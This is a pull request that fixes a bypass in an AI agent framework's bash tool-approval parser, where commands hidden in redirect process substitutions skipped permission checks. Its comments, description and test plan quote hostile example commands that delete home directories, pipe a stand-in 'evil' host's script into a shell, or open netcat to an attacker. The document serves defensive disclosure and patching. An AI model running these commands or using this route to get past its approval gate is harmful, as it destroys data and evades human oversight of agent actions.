### PR TITLE
fix: validate commands inside redirect process substitutions

### DIFF
--- a/connectonion/useful_plugins/tool_approval/bash_parser.py
+++ b/connectonion/useful_plugins/tool_approval/bash_parser.py
@@ -91,9 +91,13 @@ def extract_commands_from_bash(command: str) -> list[str]:
         for attr in ('parts', 'list'):
             for child in getattr(node, attr, []) or []:
                 extract_from_node(child)
-        sub = getattr(node, 'command', None)
-        if sub is not None:
-            extract_from_node(sub)
+        # Descend into nested commands (command substitution) AND redirect
+        # targets. Process substitution in a redirect (e.g. `echo x > >(rm -rf /)`)
+        # or `cat < <(curl evil)` runs a real subcommand that must be checked.
+        for attr in ('command', 'output', 'input', 'heredoc'):
+            sub = getattr(node, attr, None)
+            if sub is not None and hasattr(sub, 'kind'):
+                extract_from_node(sub)
 
     for tree in parts:
         extract_from_node(tree)
@@ -137,9 +141,14 @@ def _extract_subcommands(command: str) -> list[tuple[str, str]]:
         for attr in ('parts', 'list'):
             for child in getattr(node, attr, []) or []:
                 extract_from_node(child)
-        sub = getattr(node, 'command', None)
-        if sub is not None:
-            extract_from_node(sub)
+        # Descend into nested commands (command substitution) AND redirect
+        # targets. Process substitution in a redirect (e.g. `echo x > >(rm -rf /)`)
+        # or `cat < <(curl evil)` runs a real subcommand that must be checked,
+        # otherwise it would bypass the per-command permission check entirely.
+        for attr in ('command', 'output', 'input', 'heredoc'):
+            sub = getattr(node, attr, None)
+            if sub is not None and hasattr(sub, 'kind'):
+                extract_from_node(sub)
 
     for tree in bashlex.parse(command):
         extract_from_node(tree)


### PR DESCRIPTION
## Problem
The bash tool-approval control is bypassable, allowing arbitrary command execution.

`tool_approval` is supposed to gate the `bash` tool: `check_bash_chain_permitted()` parses the command with bashlex, extracts every subcommand, and requires each to be permitted ("⚠️ CRITICAL: Prevents sneaking dangerous commands via chaining"). But `_extract_subcommands()._recurse()` only descends into `parts`, `list`, and `command` (command substitution) — **not** into redirect targets. A command hidden in a redirect process substitution is never extracted:

```
echo hi > >(rm -rf ~)          # extracted: ['echo']  -> APPROVED
cat  < <(curl http://evil|sh)  # extracted: ['cat']   -> APPROVED
```

The bash tool then runs the full string via `subprocess.run(command, shell=True, executable="/bin/bash")`, and real bash executes the process substitution. Net effect: any caller able to get one benign bash command pre-approved, or any prompt-injected agent step, achieves arbitrary command execution with no approval prompt.

Verified: `bash -c 'echo hi > >(touch /tmp/pwn_marker)'` creates `/tmp/pwn_marker` while the validator reports the command as just `echo`. CVSS ~8.0, CWE-863 → CWE-78.

## Fix
Make `_recurse` (in both `extract_commands_from_bash` and `_extract_subcommands`) also descend into redirect targets `output`, `input`, and `heredoc`, so process substitutions inside redirects are extracted and permission-checked like any other command.

## Test Plan
- [ ] Existing test suite passes (`pytest tests/unit/test_bash_parser.py tests/unit/test_tool_approval.py`, Python ≥3.10)
- [ ] `echo hi > >(rm -rf /tmp/x)`, `cat < <(curl evil|sh)`, `ls > >(nc atk 4444)` are now BLOCKED
- [ ] Benign `echo done > out.txt`, `git status && ls -la`, `git diff --staged` still ALLOWED

## Security Note
High severity, CWE-863/CWE-78. Reported by FailSafe Researcher (authorized security review).